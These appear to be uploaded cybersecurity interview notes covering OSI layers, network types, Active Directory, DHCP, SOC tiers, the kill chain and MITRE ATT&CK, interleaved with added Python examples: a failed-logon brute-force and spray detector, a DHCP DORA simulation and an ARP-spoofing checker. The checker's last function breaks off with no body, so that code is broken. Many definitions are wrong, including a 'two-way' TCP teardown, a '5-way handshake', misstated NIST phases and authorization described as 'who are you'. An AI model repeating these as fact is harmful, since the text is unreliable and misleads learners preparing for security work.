Interview Notes

The document outlines the OSI model, which consists of seven layers that facilitate communication between devices in a network. Each layer has specific functions, such as the Application layer for user interfaces, the Transport layer for error-free data transmission, and the Network layer for routing. Additionally, it discusses various network types (LAN, WAN, MAN, PAN), security concepts like authentication and authorization, and the importance of the CIA triad in data security.

Uploaded by nagarjuna

Networking concepts

OSI layers (Open Systems Interconnection), ISO / ITU, 1984

When two devices want to communicate (peer to peer, client to server, client to DB, client to application, client to printer, etc.), several protocols, rules, regulations or defined algorithms are involved before communication finally happens between the devices.
This communication is called a communication channel.
This communication channel was introduced by ISO in 1984 and is called OSI layer communication.

ex: One of the end users wants to open facebook.com in the web browser
One of the end users wants to transfer money
One of the end users wants to book a Rapido

There are seven OSI layers. Those layers are

7) Application layer
6) Presentation layer
5) Session layer
4) Transport layer
3) Network layer
2) Data link layer - two sublayers: LLC (Logical link control, VLAN) and MAC (Media access control)
1) Physical layer

OSI layer table (columns: layer number | layer name | definition or description | data format or PDU | attacks)

7 - Application layer
Definition: To provide any information or to get any information we use the application layer.
PDU: Data
Attacks: OWASP TOP 10, SANS TOP 25, MITM, Session hijacking
Features
1) Web browsing: HTTP (80), HTTPS (443), SSL (443), TLS (443)
2) Messaging: SMTP (25), IMAP (143), POP3 (110), ICMP (no port number)
3) Virtual terminal: SSH (22), Telnet (23), RDP (3389)
4) File transfer: FTP (20, 21), SFTP (22), SCP (22), NFS, CIFS, WinSCP
6 - Presentation layer
Definition: It will convert one form of the data into another form of the data.
PDU: Data
Attacks: OWASP TOP 10, SANS TOP 25, MITM, Session hijacking
Features or examples
1) Encryption and decryption
2) Encoding and decoding
3) Data compression
4) Decimal to binary
5) Binary to decimal
6) ASCII or EBCDIC

1) Encryption: Converting plain text data or clear text data into encrypted data using a password or key or secret along with an algorithm is called encryption.
The opposite of encryption is decryption.
Note: Encryption and decryption are bidirectional (reverse is possible), and these two are examples of cryptography.
2) Encoding: Converting messages into audio or video or some other file format is called encoding.
The opposite of encoding is decoding. This is also bidirectional (reverse is possible).
3) Data compression: Compressing the data
ex: File compression from 5MB to 3MB

Binary to decimal
1110 = 0*2^0 + 1*2^1 + 1*2^2 + 1*2^3 = 0 + 2 + 4 + 8 = 14

Decimal to binary (repeated division by 2, reading the remainders from bottom to top)
12 / 2 = 6, remainder 0
6 / 2 = 3, remainder 0
3 / 2 = 1, remainder 1
1 / 2 = 0, remainder 1
12 decimal number = 1100 binary
5 - Session layer
Definition: It will manage the sessions.
PDU: Data
Attacks: OWASP TOP 10, SANS TOP 25, MITM, Session hijacking, POODLE attack, Heartbleed attack, Sweet32
Features
1) Session management - Managing the sessions
2) Authentication - Providing the credentials and logging in to a system (end user machines, applications, cloud services, DB, servers, etc.)
Authentication represents the identity of the end user
Authentication represents WHO AM I?
3) Authorization: Giving the permission or grant or access or privilege by the backend server to the front end user
Authorization represents WHO ARE YOU?
4 - Transport layer
Definition: The transport layer will provide end to end communication between two devices without any errors (error free control) and also data flow control; that is how it will deliver the data.
PDU: Segments / Datagrams
Attacks: TCP flood attack, SYN flood attack, UDP flood attack
Features
1) Segmentation
2) Error free control
3) Data flow control
1) Segmentation - Dividing larger data into smaller chunks of data is called segmentation.
2) Error free control - Whenever peer to peer or client to server communication happens, the transport layer will deliver the message without any errors, so that the peer device can receive a meaningful message (every segment has a segment id, sequence number, ACK number, source and destination port, etc.)
3) Data flow control (data transfer rate): When two peer devices want to send data to each other, they will exchange negotiations, and whatever maximum capability exists as per their data transfer rate, the data will flow at that rate.

Example protocols
TCP and UDP
TCP - Transmission control protocol - Data format - Segment
UDP - User datagram protocol - Data format - Datagram

TCP 3 way handshake (Important)

Between client and server or peer to peer devices, the client will send a SYN request to the server, the server will respond back with SYN+ACK and the client will respond back with ACK. The overall process happens in three steps; that is why this is called the TCP 3 way handshake.
The TCP 3 way handshake is used for connection initiation. TCP is a connection oriented protocol and a reliable protocol.
The TCP 3 way handshake uses two flags: 1) SYN 2) ACK

TCP 2 way handshake

Between client and server, the client will send a FIN request to the server and the server will respond back with an acknowledgement.
The TCP 2 way handshake uses 2 flags: 1) FIN 2) ACK
The TCP 2 way handshake is used for connection closure.

TCP 5 way handshake = TCP 3 way handshake + TCP 2 way handshake


3 - Network layer
Definition: Between peer to peer devices it will provide end to end communication using logical addresses, routing and path determination.
PDU: IP packets
Attacks: IP spoofing, ARP spoofing, ARP flooding, Packet sniffing, ICMP flood / Ping flood attack, Ping of death
Features of the network layer
1) Path determination: Choosing the best route or shortest route (based on AD - Administrative distance)
2) Routing: Between source and destination, how many routes exist, and also the routing mechanism and routing protocols it is based on
3) Logical address (virtual address): It is a numerical number or label assigned to each and every system

As per the network routing diagram there are two routes
Route number 1 - User A - R1-R2-R3-R4-R5 - User B
Route number 2 - User A - R6-R7-R5 - User B

As per the diagram the AD of Route 1 is 76 and the AD of Route 2 is 56.
So finally, when user A sends the message, it will choose the route with the lower AD (the shortest route or best route).

Example device under the network layer: Router

Example protocols are: IP (Internet protocol), ARP (Address resolution protocol)
Examples of routing protocols are:
Static route
Dynamic route (it has multiple routes)
RIP (Routing information protocol) - it will support up to 15 routers or hops
IGRP / EIGRP - Single location
OSPF (Open shortest path first) - Distributed locations
BGP - Internet connectivity
(These are L3 protocols)

A router will provide internet and a router will provide VPN connectivity.
A router is an intelligent device.
If we want to connect two LANs or two buildings, two areas, two states, two cities, two countries or two continents, a router is a must device.

2 - Data link layer
Definition: Between peer to peer devices, communication should happen via media.
PDU: Frames
Attacks: RARP poisoning or spoofing attack, RARP flooding attack, MAC flood attack
Example media
1) Water
2) Air
3) Satellite
4) Wireless

There are two sub layers

1) LLC (Logical link control): Logically, if you separate two LANs (VLAN), we can use a switch for that. For every VLAN we will assign one dedicated id number, called the VLAN ID.
2) MAC (Media access control): Through this, data can traverse from source to destination.

Example device under the data link layer is the SWITCH

Types of switches
1) Access switch - All the end users
2) Distribution switch
3) Core switch - Entire traffic of the organization

Note: A switch will not support internet and also will not support VPN.
A switch is an intelligent device and it will broadcast the traffic.

Switching protocols are

HSRP - Hot standby routing protocol - Stand alone (no backup)
VRRP - Virtual redundancy routing protocol (primary and backup - HA)
STP - Spanning tree protocol - It will eliminate loops
(These are L2 protocols)

1 - Physical layer
Definition: It will provide end to end communication using physical cable connectivity.
PDU: Bits (0 and 1)
Attacks: Physical damage of the cable, Physical theft
Example devices
Hub
Repeaters
Transceivers
Antennas
Transmitters
LAN (Local area network)
It is a computer network that connects all the network devices (printer, LT, WS, DT, servers, LB, router and switches, etc.) in a single location.
LAN interface is an internal interface.
Note: A LAN may or may not require internet.

WAN (Wide area network)
It is a computer network that connects all the network devices together from different geographical locations (India and USA) via internet or public network.
Note: A WAN must require a router.
Note2: A router will provide internet and VPN (Virtual private network).
Note3: LAN is a subset of WAN.
WAN interface is an internet interface.

MAN (Metropolitan area network)
It is a computer network that connects all the network devices together across two different metropolitan cities using internet or public network.
Note: A MAN must require a router.
Note2: A router will provide internet and VPN (Virtual private network).
Note3: LAN is a subset of MAN.

PAN (Personal area network)
It is a computer network that connects all the network devices together in a personal area or site.
Note: A PAN may or may not require internet.

Credentials: Username and password

Authentication: Providing the credentials and logging into either end points (LT, MAC, mobile, WS, desktop), servers or databases or applications or cloud, etc.
Note: Authentication will represent the identity of the end user.
Authentication will represent WHO AM I?

Authorization: It will provide granting of permission to access the services.
Authorization will be provided by the backend server.
Examples: authorization can be granted by DC (Domain controller), DB, web server or app server or cloud.
Authorization will represent WHO ARE YOU?

Data center (DC) - primary: It is a site or room where we can deploy or implement all the network devices in rack mounts using cables.

Prerequisites
AC
Proper cabling
Ventilation
Plantation
Water
CO2
Door access

DR (Disaster recovery) - backup site: It is a backup or alternative for the primary data center.

The DR site will always be maintained far away from the primary site.

The DR site can be used for high availability, and whenever any business disruption or business outage happens we will continue business operations from the alternative site.
The DR site will fix the Availability issue as per the CIA triad.

Types of cables
1) Ethernet or RJ45
2) Optical cable

Ethernet or RJ45: It will support only lower speeds like 1MB, 10MB, 100MB, 1GB
Optical cables: It will support higher speeds >1GB (10GB, 100GB, 1TB, 1PB, etc.)

CIA triad
Confidentiality: Privacy of the data, or only authorised users can access the data.
Integrity: Trustworthiness of the data; unauthorised users or attackers should not change or delete or modify or update the data.
Integrity always depends on the hash value of the data.
Hash value can be generated for files and also for passwords.
Availability: All the servers should be accessible or available to authorised users or the public or customers.
As per security best practices the availability percentage is 99%.
Note: The CIA triad is also called the AIC triad.

Vulnerability: Any weakness in the system is called a vulnerability.
ex: CCTV cameras not installed
Security guard not existing
EDR is not installed
Firewall configured wrongly

Threat: If the vulnerability is exploited or enumerated, it is called a threat.

Risk: Risk = Vulnerability * Threat
Destruction or damage
Risk = Likelihood * Impact
Likelihood = how many times the incident or problem will occur
Impact = Consequences because of the threat or vulnerability (financial or people)

AD (Active directory)
It is a directory of all the end users, end user systems and also OS types, and finally the servers' information is available in it.

AD group: Grouping of similar types of end users under one group is called an AD group.

Note: AD can be configured by the Windows admin or system admin or local IT or network admin.

Note: Whenever any security incident or alert is triggered by different security tools (EDR, FW, SIEM, PROXY, NIDS/NIPS, WAF, DLP, etc.), if we don't get the full details (username and IP address, OS type), we have to coordinate with the AD team to get the full details.
Attacks: 1) Golden ticket attack 2) Silver ticket attack

Types of AD
On premise (DC AD)
Cloud based (Microsoft, Google, Oracle, IBM, etc.)

DC (Domain controller)
It is a centralised authentication and authorization backend server. Whenever an end user wants to log into end points, the DC will validate whether the end user exists in the domain or not.

Example domain names are
tcs.com
cts.com
infosys.com
google.com
hcl.com

End point or end user authentication methods are
1) Kerberos (Mutual)
2) SAML (Security assertion markup language) (end point and application)
3) NTLM (Windows new technology LAN manager)

Note: All the authentication failure category of attacks (brute force attack, password spray, rainbow table, pass the hash, dictionary) relate to the end point or employee or end user.
Note 2: Event id for authentication failure: 4625
Event id for successful authentication: 4624
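As an added Python example that is not part of the original notes, the two event IDs above turned into detection logic for the brute force and password spray attacks listed. The log lines are constructed in a simplified form (not real Windows event XML), and the thresholds and time window are made-up tuning values.

```python
"""Added example (not from the original notes): detection logic over the two
Windows logon event IDs the notes give, 4625 (authentication failure) and 4624
(successful authentication), for the brute force and password spray attacks listed.

Assumptions: the log lines are constructed in a simplified
"<timestamp> <event_id> user=<account> src=<ip>" form, not real Windows event XML,
and the thresholds/window are made-up tuning values."""
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_LOGON_FAILURE = 4625
EVENT_LOGON_SUCCESS = 4624

# Constructed sample: one account hammered from 10.10.10.55 until a success,
# then one source (10.10.10.77) trying four different accounts once each.
SAMPLE_LOG = """\
2024-01-15T09:00:01Z 4625 user=jdoe src=10.10.10.55
2024-01-15T09:00:03Z 4625 user=jdoe src=10.10.10.55
2024-01-15T09:00:05Z 4625 user=jdoe src=10.10.10.55
2024-01-15T09:00:07Z 4625 user=jdoe src=10.10.10.55
2024-01-15T09:00:09Z 4625 user=jdoe src=10.10.10.55
2024-01-15T09:00:12Z 4624 user=jdoe src=10.10.10.55
2024-01-15T09:01:00Z 4625 user=alice src=10.10.10.77
2024-01-15T09:01:01Z 4625 user=bob src=10.10.10.77
2024-01-15T09:01:02Z 4625 user=carol src=10.10.10.77
2024-01-15T09:01:03Z 4625 user=dave src=10.10.10.77
2024-01-15T09:05:00Z 4624 user=alice src=10.10.10.20
"""


def parse_events(text):
    """Turn the constructed log text into dicts with a real datetime and int event id."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user_field, src_field = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),
            "user": user_field.split("=", 1)[1],
            "src": src_field.split("=", 1)[1],
        })
    return sorted(events, key=lambda e: e["time"])


def detect_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Alert when one (account, source) pair reaches `threshold` failures inside `window`,
    and again, as 'success_after_failures', if a 4624 for that pair follows while the
    failures are still inside the window: the sign that the guessing worked."""
    failures = defaultdict(list)  # (user, src) -> times of recent 4625s
    alerted = set()
    alerts = []
    for ev in events:
        key = (ev["user"], ev["src"])
        recent = [t for t in failures[key] if ev["time"] - t <= window]
        if ev["event_id"] == EVENT_LOGON_FAILURE:
            recent.append(ev["time"])
            if len(recent) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({"type": "brute_force", "user": ev["user"], "src": ev["src"], "time": ev["time"]})
        elif ev["event_id"] == EVENT_LOGON_SUCCESS and len(recent) >= threshold:
            alerts.append({"type": "success_after_failures", "user": ev["user"], "src": ev["src"], "time": ev["time"]})
        failures[key] = recent
    return alerts


def detect_password_spray(events, min_accounts=4, window=timedelta(minutes=5)):
    """Alert when one source fails against `min_accounts` distinct accounts inside `window`.
    A spray stays under per-account lockout thresholds, so it is keyed by source, not account."""
    attempts = defaultdict(list)  # src -> [(time, user)] for 4625s
    alerted = set()
    alerts = []
    for ev in events:
        if ev["event_id"] != EVENT_LOGON_FAILURE:
            continue
        attempts[ev["src"]].append((ev["time"], ev["user"]))
        recent = [(t, u) for t, u in attempts[ev["src"]] if ev["time"] - t <= window]
        attempts[ev["src"]] = recent
        accounts = sorted({u for _, u in recent})
        if len(accounts) >= min_accounts and ev["src"] not in alerted:
            alerted.add(ev["src"])
            alerts.append({"type": "password_spray", "src": ev["src"], "accounts": accounts, "time": ev["time"]})
    return alerts


if __name__ == "__main__":
    events = parse_events(SAMPLE_LOG)
    for alert in detect_brute_force(events) + detect_password_spray(events):
        print(alert)
```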

End point: Employee machine or asset or host machine or end user machine
Example end points
1) Laptop
2) MacBook
3) Workstation
4) Desktop
5) Mobile

IP (Internet protocol): IP works in the form of packets.

IP address (logical address): It is a numerical number or label assigned to each and every system in the organization.

Versions of IP
1) IPv4 - 32 bit number
2) IPv6 - 128 bit

MAC address (Media access control): Every NIC (Network interface card) has a physical address, called the MAC address.
Example MAC address: 00:AB:CD:11:10:EF
MAC address bit number is 48.

NIC card (Network interface card): It can be used to connect to the LAN or WLAN. It can convert electrical signals to data signals (messages).

IP packet = IP header + Payload
IP header: Source IP - where the packet is originating; Destination IP - where the packet has to reach
Payload: Piece of written code (message)

Static IP: Fixed IP or constant IP is called static IP.
Note: Static IP can be assigned only to servers, not to end user machines.

Dynamic IP: Changing the IP address continuously is called dynamic IP.
ex: At a desk (LAN RJ45 or wireless) - 10.10.10.1 from 9am to 10am, 10.10.10.2 from 10am to 11am

DHCP server (Dynamic host configuration protocol): The DHCP server will allocate an IP address automatically to the end user using the DORA process for a specific time period, called the lease time.

DORA
D - Discovery (End user) - Broadcast
O - Offer (DHCP server)
R - Request (End user)
A - Acknowledgement (DHCP server will allocate an empty IP address)
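The DORA exchange above as a small simulation with both sides' messages, lease time and pool exhaustion, as an added Python example that is not from the original notes. The address pool, lease length, MAC addresses and the integer clock are constructed values.

```python
"""Added example (not from the original notes): the DORA exchange as messages from
both sides, with a server that leases an unused address from its pool for the lease
time and reclaims it when the lease expires, reproducing the notes' picture of
10.10.10.1 for 9am-10am and then 10.10.10.2 for 10am-11am.

Assumptions: pool, lease length and MACs are constructed values; time is a simulated
integer clock in seconds since midnight, not real time."""

BROADCAST = "255.255.255.255"


class DhcpServer:
    def __init__(self, pool, lease_time):
        self.free = list(pool)      # addresses not currently leased
        self.leases = {}            # client MAC -> (ip, expiry)
        self.offers = {}            # client MAC -> ip tentatively offered
        self.lease_time = lease_time

    def expire(self, now):
        """Return addresses whose lease time has run out to the pool."""
        for mac, (ip, expiry) in list(self.leases.items()):
            if expiry <= now:
                del self.leases[mac]
                self.free.append(ip)

    def handle(self, msg, now):
        """Answer one client message; returns the server's message or None."""
        self.expire(now)
        mac = msg["mac"]
        if msg["type"] == "DISCOVER":
            if mac in self.leases:          # client still holds a lease: re-offer it
                ip = self.leases[mac][0]
            elif self.free:
                ip = self.free.pop(0)       # the 'empty ip address' of the notes
            else:
                return None                 # pool exhausted: the client gets no offer
            self.offers[mac] = ip
            return {"type": "OFFER", "mac": mac, "ip": ip, "lease": self.lease_time}
        if msg["type"] == "REQUEST":
            ip = self.offers.pop(mac, None)
            if ip is None or ip != msg["ip"]:
                return {"type": "NAK", "mac": mac}
            self.leases[mac] = (ip, now + self.lease_time)
            return {"type": "ACK", "mac": mac, "ip": ip, "lease": self.lease_time}
        return None


def dora(server, mac, now):
    """Discover -> Offer -> Request -> Acknowledge for one client.
    Returns (transcript of messages, address granted or None)."""
    transcript = [{"type": "DISCOVER", "mac": mac, "dst": BROADCAST}]
    offer = server.handle(transcript[-1], now)
    if offer is None:
        return transcript, None
    transcript.append(offer)
    transcript.append({"type": "REQUEST", "mac": mac, "ip": offer["ip"], "dst": BROADCAST})
    ack = server.handle(transcript[-1], now)
    transcript.append(ack)
    return transcript, ack["ip"] if ack["type"] == "ACK" else None


def demo():
    """Constructed timeline with a two-address pool and one-hour leases."""
    server = DhcpServer(["10.10.10.1", "10.10.10.2"], lease_time=3600)
    laptop_a, laptop_b, laptop_c = "00:ab:cd:11:10:ef", "00:ab:cd:22:20:aa", "00:ab:cd:33:30:bb"
    results = {}
    results["A at 9:00"] = dora(server, laptop_a, 9 * 3600)[1]          # 10.10.10.1
    results["B at 9:01"] = dora(server, laptop_b, 9 * 3600 + 60)[1]     # 10.10.10.2
    results["C at 9:10"] = dora(server, laptop_c, 9 * 3600 + 600)[1]    # None: pool exhausted
    results["C at 10:00"] = dora(server, laptop_c, 10 * 3600)[1]        # 10.10.10.1: A's lease expired
    results["A at 10:00"] = dora(server, laptop_a, 10 * 3600)[1]        # None: B still holds .2
    results["A at 10:02"] = dora(server, laptop_a, 10 * 3600 + 120)[1]  # 10.10.10.2: B's lease expired
    return results


if __name__ == "__main__":
    for step, ip in demo().items():
        print(f"{step}: {ip}")
```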

DNS (Domain name server): It will convert or map or resolve a domain name into an IP address or vice versa (IP address to domain name).

Domain name is also called FQDN (Fully qualified domain name) or hostname.

Hostname: Hostname is called the computer name or system name.
ex: LT-HYD-1001
LT-HYD-rmanuraju
ex: facebook.com developers - 10.10.10.1 - Windows 2012 - IIS server

DNS records: For domain name resolution in the DNS servers we have to configure a couple of records, called DNS records.
Example:
A
AAAA
PTR
MX
SOA

OSI layers (Open system interconnection): OSI layers can be used for communication purposes between peer to peer (neighbour or opposite) devices.
ex: Client to server
server to client
client to DB
client to application

Practical example
1) One of the end users is booking a cab
2) One of the end users is ordering food in Zomato
ISO/ITU in 1984 introduced the OSI layers
OSI layers are 7

TCP/IP layers: advanced version of the OSI layers
Under TCP/IP we have 4 layers

Malicious: It is abnormal activity or illegal or unauthorised or suspicious activity.

Malware: Malicious software program code

Sources of the malware
1) Malicious malware attachments in phishing emails
2) Drive-by downloads - downloading any files from the internet or websites
3) Files via removable devices

Category of malware
File oriented malware: .exe, .doc, .ppt, .csv, .xml, .html, .rar, .dll
Fileless oriented (Lolbins): WMI, Windows registry keys, PowerShell, python exe, perl

Lolbins: Living off the land binaries
WMI, Windows registry keys, PowerShell, python exe, perl

Examples of malware
1) Virus
2) Worm
3) Trojan
4) Ransomware
5) Adware
6) Spyware
7) Keyloggers
8) Mimikatz

Prevention or remediation of malware: AV/AM/EDR (NGAV)/XDR

Threat actor / Intruder / Attacker or Hacker or Adversary: Whoever is doing hacking to gain unauthorised access, data exfiltration, to get an easy way of earning money or to gain data.

Agent/Sensor: It is a piece of software (file) and it is provided by the vendor or whoever develops the tool.
Ex AV/AM vendors
McAfee
Avast
AVG
CrowdStrike
Defender
Sophos
Norton

AM/AV: AV/AM will protect or block or quarantine all malware category attacks.

EDR (NGAV): It will prevent or protect or block or quarantine all malware category attacks.

XDR: It will prevent or protect or block or quarantine all malware category attacks.
All these solutions (AV/AM, EDR, XDR) can be implemented on end points or servers - End point security.

NDR: It will prevent or protect or safeguard or block all the attacks happening at the network level - Network security.
ex: Phishing emails

MDR (SIEM + SOAR): It will prevent or block or protect or safeguard at all levels across the organization whenever a security incident happens - SOC (CS).

Firewall (NGFW): It will monitor inbound traffic or outbound traffic and, based on the policies configured, it will either allow the traffic or block the traffic.

Inbound traffic or Incoming traffic: The traffic coming from external or public to the internal organization is called inbound or incoming traffic (IP packets).

Outbound traffic or Outgoing traffic: The traffic going from internal to external or internet or public is called outbound traffic.

Netflow: The sum of the incoming traffic and outgoing traffic.
Note: Netflow is the data terminology provided by Cisco; the flow terminology depends on which routers and switches we are using:
Netflow - Cisco routers and switches (Cisco)
Jflow - Juniper routers and switches (Juniper)
sFlow - HP routers and switches (HP)
Netflow - Avaya
Netflow - Huawei
Netflow - Aruba
Netflow - IBM

Policy: Rules or conditions or regulations or protocol or correlation rule

DLP (Data loss or data leak prevention): It will prevent or block or safeguard against all the data breaches or data exfiltrations or data exposure or leaking of the data.

DLP types
End point
Network
Websites / Applications
Cloud

Intrusion: It is malicious or abnormal or illegitimate or suspicious activity.

IDS (Intrusion detection system): Whenever any abnormal or suspicious or illegitimate or unauthorised activity is done by an attacker, IDS will do monitoring and detection only; it will not block or prevent the abnormal activity.

IPS (Intrusion prevention system): Whenever any abnormal or malicious or suspicious or illegitimate or unauthorised activity is done by an attacker, IPS will do detection, identification and also prevention and blocking of the abnormal activity.

Types of IDS / IPS
Host level or end point level: HIDS / HIPS - Deployment: agent and server (tool)
Network level: NIDS - SPAN/mirror or promiscuous; NIPS - inline method or promiscuous
Wireless or WiFi: WIDS - SPAN/mirror or promiscuous; WIPS - inline method or promiscuous

OWASP TOP 10 (Open web application security project): It is an institution or organization which will conduct a survey on application layer attacks (layer 7) and finally OWASP will make a top 10 of the attacks.
Initially OWASP conducted the survey in 2010 and later in 2013, 2017, 2021.
2024 - Application: TCS, INFOSYS, Bank of America, SBI, Continental health, AT&T

EX: SQL injection attack (injection flaw attack)
XSS attack (Cross site scripting attack)
Broken access control
Broken authentication
Insecure design

Note: OWASP is providing surveys in Application, Mobile and also ICS (industrial control system).

WAF (Web application firewall): It will prevent or block or safeguard against all OWASP TOP 10 category attacks (application layer or layer 7).
Ex: Akamai
Barracuda
Imperva
Citrix
F5

SDLC life cycle: Software development life cycle
Phases of the SDLC life cycle
1) Requirement
2) Design
3) Development
4) Testing
5) Release phase
(Agile / Scrum)

SSDLC: Secure software development life cycle - Application security or product security or mobile security, OT, IOT, IIOT

CI/CD: Continuous integration and continuous development

CIS benchmark or audit policies (Center for internet security): CIS is an organization that provides benchmarks or compliances for mobile OS, end point OS, cloud, servers and databases.
It is the initial security configuration or implementation that can be configured on the OS side to reduce the attack vector or attack complexity.
ex: Microsoft Windows Server 2012 R1 - 225 controls: 150 passed, 75 controls failed
Note: CIS benchmark compliances can be implemented by the respective mobile team, servers team, end point team, DB team and cloud team.
Note2: The vulnerability analyst's role is auditing or verifying that all the compliances are configured and also whether they passed or failed.

SIEM (Security information and event management): It is a combination of both SIM and SEM (2005).
SIEM tool is a
1) Log collection or log onboarding or log integration tool
2) Log processing tool
3) Log analysis tool
4) Log monitoring tool
5) Incident alerting tool
6) Incident investigation tool

SOC (Security operation center): It is a dedicated room or site where the cyber security analysts or information security analysts will sit and monitor 24*7*365 days, and whenever any security incident is triggered these cyber security analysts (L1, L2 and L3) will take up the security incident investigation or forensic analysis.

Other names for SOC
Blue team
Defensive team
CERT - Computer emergency response team
CSIRT - Cyber security incident response team
SIRT - Security incident response team
CDC - Cyber defence center

RCA (Root cause analysis): It is a document and it will provide a step by step process of how, where, when and why the incident got compromised and how we have taken care of the incident response.
This document will act as a reference document or knowledge base document for future reference.

MTTD (Mean time to detection): The average time taken to detect the incident
MTTI (Mean time to identification): The average time taken for identifying the incident (malware, authentication failure, OWASP TOP 10, flooding, spoofing and so on)
MTTR (Mean time to recovery): The average time taken for data recovery

Levels of the SOC or support structure
Level 1 or Tier 1 or L1: Security analyst, Cyber security analyst, Information security analyst - 0-4 years
Level 2 or Tier 2 or L2: Senior security analyst, Senior cyber security analyst, Senior security analyst, Threat detector - 4-6 years
Level 3 or Tier 3 or L3: Threat hunters, Malware analysis, Reverse engineering, Forensic analysis - 6-9 years
SME (Subject matter expert): Technically strong - 8+
Level 4 or L4 or Tier 4: SOC Manager - 8+

SOP (Standard operating procedure documents) or Playbook or Runbook: This document will provide, whenever a security incident is received, what the L1 team has to do, what the L2 team has to do and what the L3 team has to do, by providing steps or instructions for different types of security incidents or attacks.

Proxy or web gateway or application gateway or secure web gateway: It is a gateway or bridge between end users and external websites or applications.

The proxy can validate, whenever an end user or the public is trying to access any website, whether the requested website contains any malicious content or not. In case the website contains malicious content the proxy can block it; in case the website does not contain malicious content it will allow it.

Blocklisting: Blocking of either IP address, hash value, domain name, URL link, MAC address, etc. in the respective tools is called blocklisting.

Whitelisting: Allowing or granting or giving the permission to IP address, hash value, domain name, URL link and MAC address in the respective tools is called whitelisting.

Encryption: The process of converting plain text data or clear text data into encrypted data using a password or key.

Decryption: The encrypted data can be converted back into plain text data or clear text data.

VPN (Virtual private network): VPN is a virtual network formed between the end user and the office location via the public network or internet using a tunnel.

Types of VPN
1) Remote VPN / IPsec VPN
2) Site to site VPN

Note: VPN will provide confidentiality, encryption, authenticity, authorization and non repudiation.

Types of encryption
Data at rest encryption: Encrypting the data while it is at rest is called data at rest encryption. Ex: DB encryption, OS encryption, disk encryption
Data in transit encryption: Encrypting the data at the transfer level is called data in transit encryption. ex: VPN authentication, website access, RDP access, email

FIM (File integrity monitoring)
Integrity: Trustworthiness of the data; an unauthorised attacker or user should not add/delete or modify or change the content of the data.
Integrity can be monitored to identify whether any malware infection is being executed by an attacker, or else whether internal employees or users are trying to access an unauthorised file.

Cyber kill chain process: It is a phase by phase or step by step approach of how the threat actor will do the hacking of the targeted machine (end user machine, servers, databases, network devices, applications, cloud, mobile, OT, IOT devices, etc.)

Cyber kill chain phases are
1) Recon or Reconnaissance
2) Weaponisation
3) Transport / Delivery
4) Exploitation
5) Installation (Persistence - continuous monitoring)
6) C2C control (Command and control)
7) Action on objective

Note: The cyber kill chain process is an offensive mechanism (hacking can be done by an attacker).

MITRE ATT&CK framework
A - Adversary (Attacker)
T - Tactics (14)
T - Techniques (500+ techniques)
CK - Common Knowledge base

TTP: Tactics, Techniques and Procedures

It is a centralised database that provides attacker tactics, techniques and procedures, and along with that it provides defensive mechanisms like detections and mitigations as well.
It is a combination of both offensive and defensive mechanisms.
Under the MITRE ATT&CK framework there are 14 tactics and 500+ techniques.

Interview questions
1) What is meant by the cyber kill chain process? Explain.
2) Take any cyber or network attack and explain it via the cyber kill chain process.
3) What is the difference between the cyber kill chain process and the MITRE ATT&CK framework?
4) Take any 4 or 5 tactics as per the MITRE ATT&CK framework and explain at least 2 or 3 techniques for each and every tactic.
5) How are you utilizing the MITRE ATT&CK framework in your organization?
Incident life cycle management: It is a step by step process or phase by phase approach of how we can take care of security incident investigation or forensic analysis whenever a security incident is received.

Incident life cycle management frameworks / organizations
1) ITIL - Information technology infrastructure library
2) NIST - National institute of standards and technology

ITIL incident life cycle management
1) Preparation
2) Identification
3) Containment (network isolation / disconnecting from the network)
4) Eradication / Mitigation
5) Recovery
6) Lessons learned or post mortem report

NIST
1) Identify
2) Detect
3) Protect
4) Recover
5) Report

Log: Any computer recorded activity or action is called a log.

Example Windows log types (Windows log on/in types)
1) Application
2) Security or Audit
3) Setup (Configuration)
4) System (Performance)
5) Forwarded events

Event: An abnormal change in the log is called an event (attacker).
There are two different types of activities
1) Normal - non malicious or non suspicious or legitimate
2) Abnormal - malicious or suspicious or illegitimate or unauthorised

Alert: Notification of abnormal activity is called an alert.
Types of receiving the notifications
1) Email
2) Mobile
3) Security tool (Dashboard)
4) Syslog
5) SNMP traps

Incident: It will give a negative impact to the organization for CIA (confidentiality, integrity and availability).

All operational support teams
Corporate IT
1) Help desk / Service desk
2) Asset inventory / Local IT
3) Windows support
4) Linux support
5) Storage and backup
6) NOC (Network operation center)
7) DB support team
8) Application support team
9) SOC team
Engineering (R&D)
1) Product development
2) Application development
3) Mobile development
4) DevOps
5) ML/AI

ARP (Address resolution protocol): It will convert or map a layer 3 (network) IP address to a layer 2 (MAC) address.
RARP (Reverse address resolution protocol): It will convert or map a layer 2 MAC address to a layer 3 IP address.
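The ARP and RARP mappings above, plus a check for the inconsistency that ARP spoofing (listed under the network-layer attacks) leaves in that mapping, as an added Python example that is not part of the original notes. The ARP replies are constructed pairs; only 00:AB:CD:11:10:EF comes from the notes, the other addresses are made up.

```python
"""Added example (not from the original notes): build the layer 3 to layer 2 mapping
that ARP provides (and the reverse lookup RARP provides), then flag the inconsistency
that the ARP spoofing listed under the network-layer attacks leaves behind: one IP
address claimed by two different MAC addresses.

Assumptions: the ARP replies are constructed (sender IP, sender MAC) pairs, not
captured frames; the first MAC is the notes' example MAC, the rest are made up."""
from collections import defaultdict

# Constructed ARP replies seen on one LAN segment over time. The gateway
# 10.10.10.1 is answered by its real NIC, then a second MAC starts claiming it.
SAMPLE_ARP_REPLIES = [
    ("10.10.10.1", "00:AB:CD:11:10:EF"),
    ("10.10.10.2", "00:AB:CD:22:20:AA"),
    ("10.10.10.3", "00:AB:CD:33:30:BB"),
    ("10.10.10.1", "00:AB:CD:11:10:EF"),
    ("10.10.10.1", "DE:AD:BE:EF:00:01"),
    ("10.10.10.3", "00:AB:CD:33:30:BB"),
]


def build_arp_table(replies):
    """IP -> set of MACs that have claimed it (ARP direction: IP to MAC).
    A healthy table has exactly one MAC per IP; MACs are normalised to lower case."""
    table = defaultdict(set)
    for ip, mac in replies:
        table[ip].add(mac.lower())
    return dict(table)


def reverse_lookup(table, mac):
    """RARP direction: which IPs has this MAC claimed?"""
    return sorted(ip for ip, macs in table.items() if mac.lower() in macs)


def find_conflicts(table):
    """IPs claimed by more than one MAC: a cache that accepted all of these replies
    would have been overwritten, which is how ARP poisoning redirects traffic."""
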